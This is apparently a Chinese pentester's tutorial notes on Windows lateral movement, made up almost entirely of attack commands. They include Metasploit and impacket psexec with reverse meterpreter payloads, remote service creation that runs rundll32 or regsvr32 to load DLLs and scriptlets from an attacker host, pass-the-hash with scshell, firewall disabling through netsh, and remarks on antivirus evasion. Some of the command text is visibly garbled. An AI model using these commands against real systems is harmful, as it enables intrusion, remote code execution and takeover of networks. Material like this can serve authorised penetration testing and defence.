横向移动手法介绍教程
https://www.bilibili.com/video/BV1Hz4y1Z7pJ https://www.bilibili.com/video/BV1Hz4y1Z7pJ?p=2 https://www.bilibili.com/video/BV1Hz4y1Z7pJ?p=3
smbmap信息搜集 远程管理必须使用Admin$
查看远程共享
smbmap -H 192.168.123.45 smbmap -u administrator -p 123456 -d workgroup -H 192.168.123.45
msf psexec (成功,不免杀,开启防火墙则无效) 使用的是139,445端口,目标机器必须开放这个端口。
1. impacket-smbserver2. msf psexecset payload windows/x64/meterpreter/reverse_tcpset RHOST 192.168 .123 .45 set LPORT <Local Port>set LHOST <Local IP>set SMBUSER <local admin username>set SMBPASS <local admin password >
漏洞利用,使用口令去进行命令执行
psexec.py(成功,不免杀,开启防火墙则无效) python /usr/share/doc/python-impacket/examples/psexec.py workgroup/administrator@192.168.123.45 cmd.exe
sc.exe (成功,开启防火墙也有效,不免杀) 开启rundll32的反弹shell监听服务器,不会的可以看这个视频:https://www.bilibili.com/video/BV1ey4y1k7PA/
激活管理员账号/ active:yes192.168 .123.45 \admin$ / user:"administrator" "123456" 192.168 .123.45 \admin$ /del 192.168 .123.45 create whaleReverse15 binpath= "C:\w indows\s ystem32\c md.exe /c C:\w indows\s ystem32\r undll32.exe \\ 192.168.123.123\A zye\t est.dll,0" 192.168 .123.45 start whaleReverse15
csexec(能过360,但不能过windows防火墙) net user administrator 123456 use \\192.168 .28.1 \admin$ /user:"administrator" "qwf123!!" .exe \\192.168 .28.1 cmd.exe use \\192.168 .123.45 \admin$ /user:"administrator" "123456" .exe \\192.168 .123.45 cmd.exe use \\192.168 .123.184 \admin$ /user:"administrator" "123456" .exe \\192.168 .123.45 cmd.exe
用法有点复杂,没有继续看的工具 scshell 使用这篇反弹shell “https:// whale3070.github.io/ tools/ 2020 / 10 / 04 / 1 1-x/ ”中提到的Regsvr32.exe/s /n /u / i:http:// 192.168 .123.123 :8080 /6IEDA48otwgL.sct 192.168 .123.45 filepermsvc "C:\w indows\s ystem32\c md.exe /c C:\w indows\s ystem32\r undll32.exe \\ 192.168.123.123\r DAEep\t est.dll,0" . administrastor 123456 /s /n /u / i:http:// 192.168 .123.123 :8080 /6IEDA48otwgL.sct scrobj.dll192.168 .123.123 \MJear\test.dll,0 - target-ip 192.168 .123.45 - service-name filepermsvc - no-cmd " C:\w indows\s ystem32\r undll32.exe \\ 192.168.123.123\r DAEep\t est.dll,0" . administrastor 123456 = query computername= 192.168 .123.45 query= "filepermsvc" username= administrastor password= 123456 192.168 .123.45 filepermsvc "C:\w indows\s ystem32\c md.exe /C C:\W indows\M icrosoft.NET\F ramework\v 4.0.30319\m sbuild.exe C:\p ayload.csproj" . administrator 123456
2020.10.07
python3 scshell.py WORKGROUP/WIN-U8OIU3QM15C@192.168.123.45 -hashes aad3b435b51404eeaad3b435b51404ee:58 a478135a93ac3bf058a5ea0e8fdb71C :\windows\system32\cmd.exe /c C:\windows\system32\rundll32.exe \\192.168.123.123 \wLWQND\test.dll,0
原理:
sc config filepermsvc binpath= "C:\w indows\s ystem32\c md.exe /c C:\w indows\s ystem32\r undll32.exe \\ 192.168.123.123\w LWQND\t est.dll,0""C:\w indows\s ystem32\c md.exe /c C:\w indows\s ystem32\r undll32.exe \\ 192.168.123.123\h ltzs\t est.dll,0" . administrator 123456 192.168 .123.45 filepermsvc "C:\w indows\s ystem32\c md.exe /c C:\w indows\s ystem32\r undll32.exe \\ 192.168.123.123\h ltzs\t est.dll,0" . administrator 123456
sharpmove SharpMove.exe action =startservice computername =remote.host.local servicename =TestService
关闭防火墙命令 关闭公网上的防火墙netsh advfirewall set currentprofile state off
关闭内网中的防火墙netsh advfirewall set privateprofile state off
远程关闭防火墙 netsh -r 192.168 .123.45 -u administrator -p 123456 -c advfirewall set allprofiles state on
https://docs.microsoft.com/en-us/troubleshoot/windows-server/networking/netsh-advfirewall-firewall-control-firewall-behavior
https://www.windows-commandline.com/enable-disable-firewall-command-line/
参考资料 https://pentestlab.blog/2020/07/21/lateral-movement-services/
https://github.com/Mr-Un1k0d3r/SCShell
https://github.com/0xthirteen/MoveKit
https://github.com/0xthirteen/SharpMove
https://github.com/0xthirteen/SharpRDP